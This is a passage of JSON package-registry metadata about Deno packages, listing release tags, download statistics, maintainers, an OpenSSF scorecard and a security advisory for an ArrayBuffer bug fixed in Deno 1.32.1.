"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T01:15:27.148Z","dependent_packages_count":11,"downloads":18020087,"downloads_period":"total","dependent_repos_count":356,"rankings":{"downloads":2.542171183768185,"dependent_repos_count":2.1896290125844167,"dependent_packages_count":3.531356329712384,"stargazers_count":12.09799779847083,"forks_count":9.989577129243598,"docker_downloads_count":3.236226684728404,"average":5.597826356417969},"purl":"pkg:cargo/serde_v8","advisories":[{"uuid":"GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","url":"https://github.com/advisories/GHSA-c25x-cm9x-qqgx","title":"Deno improperly handles resizable ArrayBuffer","description":"### Impact\n\n[Resizable ArrayBuffers](https://github.com/tc39/proposal-resizablearraybuffer) passed to asynchronous native functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write.\n\nIt is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0.\n\nDeno Deploy users are not affected.\n\n### Patches\n\nThe problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. A future version of Deno will re-enable resizable ArrayBuffers with a proper fix.\n\n### Workarounds\n\nUpgrade to Deno 1.32.1, or run with `--v8-flags=--no-harmony-rab-gsab` to disable resizable ArrayBuffers.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-03-23T23:13:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.9,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx","https://github.com/denoland/deno/pull/18395","https://github.com/denoland/deno/releases/tag/v1.32.1","https://nvd.nist.gov/vuln/detail/CVE-2023-28445","https://github.com/denoland/deno/pull/18452","https://github.com/advisories/GHSA-c25x-cm9x-qqgx"],"source_kind":"github","identifiers":["GHSA-c25x-cm9x-qqgx","CVE-2023-28445"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T00:03:53.363Z","updated_at":"2026-09-08T21:11:42.176Z","epss_percentage":0.00971,"epss_percentile":0.59653,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.103.0","vulnerable_version_range":"= 0.102.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"serde_v8","versions":[{"first_patched_version":"0.88.0","vulnerable_version_range":"= 0.87.0"}],"purl":"pkg:cargo/serde_v8"},{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.32.1","vulnerable_version_range":"= 1.32.0"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/serde_v8","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/serde_v8","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/serde_v8/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T01:03:52.167Z","updated_at":"2022-11-08T01:03:52.167Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:25.439Z","updated_at":"2023-07-18T22:41:25.439Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5284169,"name":"deno","ecosystem":"conda","description":null,"homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":10,"first_release_published_at":"2021-12-22T02:02:08.000Z","latest_release_published_at":"2022-10-11T22:02:25.000Z","latest_release_number":"1.26.1","last_synced_at":"2026-04-17T13:04:16.571Z","created_at":"2022-10-03T15:40:36.942Z","updated_at":"2026-08-23T02:24:46.139Z","registry_url":"https://anaconda.org/conda-forge/deno","install_command":"conda install -c conda-forge deno","documentation_url":null,"metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your 